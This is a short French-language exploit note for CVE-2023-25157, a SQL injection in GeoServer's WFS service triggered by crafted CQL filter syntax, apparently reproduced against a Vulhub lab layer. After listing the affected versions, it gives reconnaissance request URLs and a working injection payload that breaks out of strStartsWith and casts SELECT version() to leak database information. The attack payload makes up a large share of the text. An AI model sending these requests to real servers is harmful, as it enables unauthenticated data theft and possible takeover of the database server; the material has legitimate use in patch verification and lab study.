
Exploit pour CVE-2023-25157 : injection SQL dans le service WFS de GeoServer via une syntaxe de filtre CQL conçue, permettant l'extraction de données à distance non authentifiée et un compromis potentiel du serveur de base de données.
En raison d'un manque de filtrage des entrées utilisateur, un attaquant distant non authentifié peut construire une syntaxe de filtrage malformée, contourner l'analyse lexicale de GeoServer, provoquer une injection SQL, obtenir des informations sensibles du serveur, et éventuellement obtenir les privilèges du serveur de base de données.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
Recherche
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Obtenir les attributs du nom de fonctionnalité vulhub:example
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



